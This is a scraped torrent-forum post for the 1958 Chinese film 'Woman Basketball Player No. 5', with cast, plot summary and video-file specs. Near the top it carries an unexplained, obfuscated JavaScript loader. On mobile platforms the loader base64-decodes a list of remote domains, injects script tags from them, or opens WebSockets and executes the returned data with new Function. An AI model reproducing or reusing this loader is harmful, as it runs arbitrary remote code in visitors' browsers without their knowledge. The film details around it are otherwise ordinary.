女篮五号[4K修复版+国语中字].迅雷下载.Woman.Basketball.Player.No.5.1958.WEB-DL.4K

版主小s 1月前 259

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 女篮五号 / Woman Basketball Player No. 5

◎年 代 1958

◎产 地 中国大陆

◎类 别 剧情 / 爱情 / 运动

◎语 言 汉语普通话

◎上映日期 1958-01(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt0081770/

◎豆瓣评分 7.0/10 (2117人评价)

◎豆瓣链接 https://movie.douban.com/subject/1303341/

◎片 长 85分钟

◎导 演 谢晋 Jin Xie (id:1042500)

◎编 剧 谢晋 Jin Xie (id:1042500)

◎演 员 刘琼 Qiong Liu (id:1030875)

秦怡 Yi Qin (id:1007442)

曹其纬 Qiwei Cao (id:1361134)

于明德 Mingde Yu (id:1364064)

崔超明 Chaoming Cui (id:1313821)

王琪 Qi Wang (id:1356276)

林榛 Zhen Lin (id:1339583)

向梅 Mei Xiang (id:1321269)

毕克 Ke Bi (id:1322554)

王执芳 Zhifang Wang (id:1436111)

于冲 Chong Yu (id:1364504)

金川 Chuan Jin (id:1428548)

茂路 Lu Mao (id:1412081)

于飞 Fei Yu (id:1336707)

黄准 Zhun Huang (id:1398668)

沈西林 Xilin Shen (id:1347960)

黄绍芬 Shaofen Huang (id:1049277)

韦纯葆 Chunbao Wei (id:1443534)

王月白 Yuebai Wang (id:1369225)

何瑞基 Ruiji He (id:1458475)

王铁彬 Tiebin Wang (id:1398567)

丁里 Li Ding (id:1399425)

强明 Ming Qiang (id:1400760)

陆仲伯 Zhongbo Lu (id:1412883)

◎标 签 体育 / 篮球 / 1958 / 中国大陆 / 运动 / 文艺 / 爱情 / 国产

◎简 介

解放前的上海,田振华(刘琼饰)是东华篮球队的主力队员,他和球队老板(崔超明饰)的女儿林洁(秦怡饰)相爱着。由于收人贿赂,老板故意要自已的球队输给洋人,田振华异常气愤,带队打赢了比赛,老板非常生气,派流氓打伤了他,并把女儿嫁给了别人。18年过去了,解放后的田振华早已是篮球教练,有一次他在自己的球员中发现一张似曾相识的脸,原来这姑娘竟是自己当年的恋人林洁的女儿林小洁(曹其纬饰)。她对体育运动却不热衷,田振华决心帮她转变观念,将来为国争光。小洁在一次比赛中不慎受重伤住院,林洁到医院看望她,巧遇了前来探视的田振华,四目相望,百感交集,他们细数了十八年来的点点滴滴......

  1. General

  2. Complete name : Woman.Basketball.Player.No..5.1958.WEB-DL.4K.H265.AAC-Dave.mp4

  3. Format : MPEG-4

  4. Format profile : Base Media

  5. Codec ID : isom (isom/iso2/mp41)

  6. File size : 9.63 GiB

  7. Duration : 1 h 30 min

  8. Overall bit rate : 15.3 Mb/s

  9. Writing application : Lavf58.30.100


  10. Video

  11. ID : 1

  12. Format : HEVC

  13. Format/Info : High Efficiency Video Coding

  14. Format profile : [email protected]@High

  15. Codec ID : hev1

  16. Codec ID/Info : High Efficiency Video Coding

  17. Duration : 1 h 30 min

  18. Bit rate : 15.2 Mb/s

  19. Width : 2 950 pixels

  20. Height : 2 160 pixels

  21. Display aspect ratio : 4:3

  22. Frame rate mode : Constant

  23. Frame rate : 25.000 FPS

  24. Color space : YUV

  25. Chroma subsampling : 4:2:0

  26. Bit depth : 8 bits

  27. Bits/(Pixel*Frame) : 0.095

  28. Stream size : 9.54 GiB (99%)

  29. Codec configuration box : hvcC


  30. Audio

  31. ID : 2

  32. Format : AAC LC

  33. Format/Info : Advanced Audio Codec Low Complexity

  34. Codec ID : mp4a-40-2

  35. Duration : 1 h 30 min

  36. Bit rate mode : Constant

  37. Bit rate : 125 kb/s

  38. Channel(s) : 2 channels

  39. Channel layout : L R

  40. Sampling rate : 48.0 kHz

  41. Frame rate : 46.875 FPS (1024 SPF)

  42. Compression mode : Lossy

  43. Stream size : 80.7 MiB (1%)

  44. Default : Yes

  45. Alternate group : 1


此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情 运动 爱情

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回